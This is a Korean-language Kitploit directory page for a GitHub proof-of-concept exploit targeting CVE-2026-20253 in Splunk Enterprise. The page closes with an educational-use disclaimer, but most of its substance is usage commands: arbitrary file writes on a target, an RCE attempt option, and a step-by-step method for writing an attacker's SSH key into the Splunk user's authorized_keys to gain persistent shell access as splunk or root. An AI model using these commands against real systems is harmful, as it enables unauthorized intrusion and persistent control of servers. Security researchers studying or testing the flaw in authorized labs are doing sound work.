Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-20253 — CVE-2026-20253 - Splunk Enterprise | Kitploit
도구/GitHubGitHub/horkimhab/cve-2026-20253
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access Tool
GitHubhorkimhab/cve-2026-20253

CVE-2026-20253

CVE-2026-20253 - Splunk Enterprise

저장소 보기
2개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-20253 - Splunk Enterprise

⚡ 간단한 사용법

이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하십시오:

  • 로컬 가상 머신
  • Docker 컨테이너
  • 격리된 실습 환경
  • 승인된 침투 테스트 환경

예제 설정:

root@kitploit:~
git clone https://github.com/HORKimhab/CVE-2026-20253
cd CVE-2026-20253

# Project use python follow below

# Create a virtual environment
python -m venv venv

# Activate the virtual environment

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# Install requirements
pip install -r requirements.txt

예제 사용법:

root@kitploit:~
# Basic check
python3 cve-2026-20253.py -t http://target:8000 --check

# Write empty/truncated file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/pwned"

# Write with content from file
python3 cve-2026-20253.py -t http://target:8000 --write "/tmp/shell.py" --content poc-content.txt

# Advanced (restore + content)
python3 cve-2026-20253.py -t http://target:8000 --write "/opt/splunk/etc/apps/.../payload.py" --content poc-content.txt --restore

# RCE attempt
python3 cve-2026-20253.py -t http://target:8000 --rce

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/path/to/target/file.py" \
  --content poc-content.txt --restore


# SSH 

# Generate SSH key pair (if you don't have one)
ssh-keygen -t ed25519 -C "poc@attacker" -f ~/.ssh/splunk_poc_key -N ""

# Or use RSA if target is older
# ssh-keygen -t rsa -b 4096 -f ~/.ssh/splunk_poc_key -N ""

cat ~/.ssh/splunk_poc_key.pub > poc-content.txt

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt \
  --restore

python3 cve-2026-20253_poc.py -t http://target:8000 \
  --write "/home/splunk/.ssh/authorized_keys" \
  --content poc-content.txt

# Make sure permissions are correct on your side
chmod 600 ~/.ssh/splunk_poc_key

# Connect
ssh -i ~/.ssh/splunk_poc_key splunk@target_ip

# Or as root
ssh -i ~/.ssh/splunk_poc_key root@target_ip


# Step 1: Create directory (may not always work)
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/.placeholder"

# Step 2: Write authorized_keys
python3 cve-2026-20253_poc.py -t http://target:8000 --write "/home/splunk/.ssh/authorized_keys" --content poc-content.txt

mkdir -p /home/splunk/.ssh
chmod 700 /home/splunk/.ssh
chmod 600 /home/splunk/.ssh/authorized_keys
chown -R splunk:splunk /home/splunk/.ssh

크레딧 또는 참고 자료

  • https://thehackernews.com/2026/06/critical-splunk-enterprise-flaw-lets.html
  • watchTowr-vs-Splunk-CVE-2026-20253: https://github.com/watchtowrlabs/watchTowr-vs-Splunk-CVE-2026-20253
  • CVE-2026-20253-0xBlackash: https://github.com/0xBlackash/CVE-2026-20253

📚 교육용 보안 연구 저장소

통제된 환경에서 사이버 보안 개념을 학습, 테스트 및 연구하기 위한 저장소입니다.


⚠️ 보안 및 법적 고지

목적

이 저장소는 교육 및 승인된 보안 연구 전용입니다.

다음에 대해 학습하는 데 도움이 되도록 설계되었습니다:

  • 보안 취약점
  • 샌드박스 및 격리 개념
  • 안전한 코딩 및 방어 관행

승인된 사용만 허용

이 저장소는 다음과 같이 권한이 있는 환경에서만 사용하십시오:

  • 개인 연구실 또는 가상 머신
  • Docker 또는 격리된 환경
  • 승인된 침투 테스트
  • 사이버 보안 교육 또는 학술 연구

무단 또는 불법 사용은 엄격히 금지됩니다.


면책 조항

저자와 기여자는 이 프로젝트로 인한 손해, 오용, 법적 문제 또는 손실에 대해 책임지지 않습니다.

이 저장소를 사용함으로써 다음에 동의하는 것입니다:

  • 귀하는 자신의 행동에 책임이 있습니다
  • 합법적이고 윤리적으로 사용할 것입니다
  • 프로젝트는 보증 없이 제공됩니다

윤리적 사용

이 프로젝트는 다음을 위해 사용됩니다:

  • 방어적 보안 연구
  • 사이버 보안 교육
  • 취약점 인식
  • 안전한 시스템 및 소프트웨어 연구

책임 있는 공개 관행을 따르고 모든 관련 법률을 준수하십시오.


연락처

책임 있는 공개 또는 협업을 위해 GitHub를 통해 저장소 관리자에게 연락하십시오.

도구 다운로드